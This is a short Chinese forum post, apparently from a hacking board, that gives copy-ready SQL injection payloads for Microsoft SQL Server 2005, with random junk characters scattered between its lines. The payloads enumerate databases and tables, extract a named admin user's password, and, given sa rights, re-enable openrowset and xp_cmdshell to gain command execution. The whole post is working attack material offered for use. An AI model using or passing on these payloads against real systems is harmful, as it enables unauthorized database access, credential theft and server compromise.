MSsql2005注入语句

admin

7 j8 H/ M6 n! _( d. _# x2 `2 N( `  I

[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
/ V3 N! b% a9 h0 x2 I' ^
) V4 T( W" I& }. ?爆表语句,somedb部份是所要列的数据库，红色数字1累加
5 \# _$ k/ x! ?$ V+ x

; y5 T. j1 Y1 A* q3 E$ Y8 V2 B[Copy to clipboard]CODE:
+ E3 f( ?* W5 z4 m! I6 ?7 ]/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

$ L. k- ^. e: M) ^+ X7 N9 P( p爆字段语句，爆表admin里user='icerover'的密码段

6 j7 Q3 g- r7 P4 z( r6 \# U9 k0 `
[Copy to clipboard]CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

5 \) I) o0 _, j3 P' k+ c' b# U& Emssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
开启openrowset
/ X- s, H, O% i* d+ x
! E8 u! }7 o0 r3 u+ Q0 N. {
[Copy to clipboard]CODE:
8 K2 H: l' d9 v0 |& ^/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

开启xp_cmdshell
: |& p  [$ d4 ?' h# v

[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
: Q+ S* t0 N- T/ ?6 p8 A0 dEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
  g1 d. O8 y0 g. f
3 M, L# c$ J7 G6 ~ok,over~~晚安
8 j8 S6 b$ y( e; g5 ?